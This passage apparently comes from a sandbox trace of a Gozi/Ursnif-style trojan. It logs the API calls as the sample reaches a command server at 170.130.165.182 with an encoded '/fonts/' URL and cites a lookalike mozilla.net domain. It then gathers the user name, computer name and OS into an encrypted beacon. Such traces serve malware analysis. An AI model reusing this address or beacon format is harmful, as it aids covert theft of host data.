returned="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz" [0251.192] lstrcatA (in: lpString1="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz", lpString2=".bak" | out: lpString1="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak") returned="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak" [0251.192] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0251.192] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0251.192] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c8 [0251.193] lstrlenA (lpString="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak") returned 370 [0251.193] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x173) returned 0x2c5fbb0 [0251.193] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x173) returned 0x2c5fd30 [0251.193] StrChrA (lpStart="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak", wMatch=0x2f) returned="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak" [0251.193] StrChrA (lpStart="170.130.165.182/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak", wMatch=0x3f) returned 0x0 [0251.193] memcpy (in: _Dst=0x2c5fbb0, _Src=0x2be00d8, _Size=0xf | out: _Dst=0x2c5fbb0) returned 0x2c5fbb0 [0251.193] lstrcpyA (in: lpString1=0x2c5fd30, lpString2="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak" | out: lpString1="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak") returned="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak" [0251.193] lstrlenA (lpString="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak") returned 355 [0251.193] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2c7) returned 0x2be08e0 [0251.193] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak", lpdwBufferLength=0x11ff040) returned 1 [0251.194] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd30 | out: hHeap=0x2860000) returned 1 [0251.194] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0251.195] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0251.195] ResetEvent (hEvent=0x38c) returned 1 [0251.195] InternetConnectA (hInternet=0xcc0004, lpszServerName="170.130.165.182", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0251.196] SetEvent (hEvent=0x38c) returned 1 [0251.196] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/f0VSlh4ZY0Jd0FgWTdUdOzU/h8l_2F5ZNl/w3MzTlY17lDO7mrj_/2FGXddeQjt1X/rj5Bf8MKPfL/_2Fr3r2T3BFijF/742_2B_2BY7mSnGBkHpqu/LKiRHi1IIPW_2Bf8/QzfZXVxopjyFXqF/x8leVl4ALa4YkwfBZP/XM0g0oFJy/XajBPiwAkisIdNSWuTJF/31UzDZrSHqFG8ti1V14/8zvtcfZ5HqpTT3uP4RtWr_/2FoZU_2F6_2B7/fM8tUsXU/VO76RHiFe2N7vu_2FRVTaHH/_2BcRPm9uL/9mO_2FWPwGjOS6kHE/nwd3tRU0QlpM/zjxeettI7CY/Sz.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0251.196] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0251.196] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0251.197] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0251.197] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0251.197] ResetEvent (hEvent=0x38c) returned 1 [0251.197] ResetEvent (hEvent=0x1c8) returned 1 [0251.197] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0251.197] GetLastError () returned 0x3e5 [0251.197] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x0) returned 0x102 [0251.197] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0251.197] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x38c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0251.749] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x0) returned 0x0 [0251.750] SetEvent (hEvent=0x38c) returned 1 [0251.750] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0251.750] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) returned 0 [0251.750] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xcc) returned 0x2c59c90 [0251.751] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x2c59c90, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x2c59c90*, lpdwBufferLength=0x11ff054*=0xca, lpdwIndex=0x11ff04c*=0x0) returned 1 [0251.751] ResetEvent (hEvent=0x38c) returned 1 [0251.751] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11ff050, dwNumberOfBytesToRead=0x4, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x11ff050*, lpdwNumberOfBytesRead=0x11ff05c*=0x4) returned 1 [0251.752] CreateStreamOnHGlobal (hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058) [0251.752] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058 | out: ppstm=0x11ff058*=0x7ba580) returned 0x0 [0251.752] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2be0bb0 [0251.753] ISequentialStream:RemoteWrite (in: This=0x7ba580, pv=0x11ff050*=0x3c, cb=0x4, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0251.753] ResetEvent (hEvent=0x38c) returned 1 [0251.753] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be0bb0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be0bb0*, lpdwNumberOfBytesRead=0x11ff05c*=0x220) returned 1 [0251.753] ISequentialStream:RemoteWrite (in: This=0x7ba580, pv=0x2be0bb0*=0x6c, cb=0x220, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0251.753] ResetEvent (hEvent=0x38c) returned 1 [0251.753] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be0bb0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be0bb0*, lpdwNumberOfBytesRead=0x11ff05c*=0x0) returned 1 [0251.755] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be0bb0 | out: hHeap=0x2860000) returned 1 [0251.755] IStream:Stat (This=0x7ba580, pstatstg=0x11fefe0, grfStatFlag=0x1) [0251.755] IStream:Stat (in: This=0x7ba580, pstatstg=0x11fefe0, grfStatFlag=0x1 | out: pstatstg=0x11fefe0) returned 0x0 [0251.755] IStream:RemoteSeek (in: This=0x7ba580, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0251.755] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x225) returned 0x2c5fd30 [0251.755] ISequentialStream:RemoteRead (in: This=0x7ba580, pv=0x2c5fd30, cb=0x224, pcbRead=0x11ff03c | out: pv=0x2c5fd30*=0x3c, pcbRead=0x11ff03c*=0x224) returned 0x0 [0251.755] IUnknown:Release (This=0x7ba580) returned 0x0 [0251.756] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0251.756] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0251.756] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0251.756] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0251.756] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0251.756] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0251.756] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0251.756] CloseHandle (hObject=0x38c) returned 1 [0251.756] CloseHandle (hObject=0x1c8) returned 1 [0251.757] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd30 | out: hHeap=0x2860000) returned 1 [0251.758] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c90 | out: hHeap=0x2860000) returned 1 [0251.758] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fbb0 | out: hHeap=0x2860000) returned 1 [0251.759] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be08e0 | out: hHeap=0x2860000) returned 1 [0251.759] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0251.760] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0251.760] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0251.760] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0251.761] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0251.763] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0251.763] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0261.768] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0261.768] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0261.769] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) [0261.769] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0261.769] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0261.769] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0261.769] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2921708818829) returned 1 [0261.769] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=29217") returned 13 [0261.770] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0261.770] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0261.770] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0261.770] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0261.772] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0261.772] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0261.773] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0261.773] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0261.773] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0261.773] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0261.776] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0261.776] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0261.776] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0261.776] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0261.776] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0261.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHFgWTdUdOzU/h8l_2F5ZNl/w3Mzk", lpUsedDefaultChar=0x0) returned 20 [0261.777] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0261.777] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0261.777] lstrlenA (lpString="protectioon.cdn4.mozilla.net") [0261.778] lstrlenA (lpString="protectioon.cdn4.mozilla.net") returned 28 [0261.778] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1d) returned 0x2c59a68 [0261.778] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59eac, _Size=0x1c | out: _Dst=0x2c59a68) returned 0x2c59a68 [0261.778] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0261.778] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2be00d8 [0261.778] GetTickCount () returned 0x1bada5c [0261.778] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x6) returned 0x2c59b28 [0261.778] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x8) returned 0x2c59b38 [0261.778] lstrlenA (lpString="%s=%s&") returned 6 [0261.778] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x13) returned 0x2c59b48 [0261.778] sprintf (_Dest=0x2c59b48, _Format="%s=%s&") [0261.778] sprintf (in: _Dest=0x2c59b48, _Format="%s=%s&" | out: _Dest="rulhulx=kftwf&") returned 14 [0261.778] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b38 | out: hHeap=0x2860000) returned 1 [0261.778] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0261.778] lstrlenA (lpString="rulhulx=kftwf&") returned 14 [0261.778] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29217&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0261.778] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd4) returned 0x2c59b68 [0261.778] strcpy (_Dest=0x2c59b68, _Source="rulhulx=kftwf&") [0261.778] strcpy (in: _Dest=0x2c59b68, _Source="rulhulx=kftwf&" | out: _Dest="rulhulx=kftwf&") returned="rulhulx=kftwf&" [0261.778] lstrcatA (lpString1="rulhulx=kftwf&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29217&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0261.778] lstrcatA (in: lpString1="rulhulx=kftwf&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29217&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="rulhulx=kftwf&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29217&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="rulhulx=kftwf&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29217&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0261.778] lstrlenA (lpString="rulhulx=kftwf&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=29217&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 211 [0261.778] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0261.778] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0261.780] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0261.780] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0261.780] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d0f8) returned 1 [0261.780] CryptSetKeyParam (hKey=0x77d0f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0261.780] CryptSetKeyParam (hKey=0x77d0f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0261.781] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c48 [0261.781] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0261.781] CryptEncrypt (in: hKey=0x77d0f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: 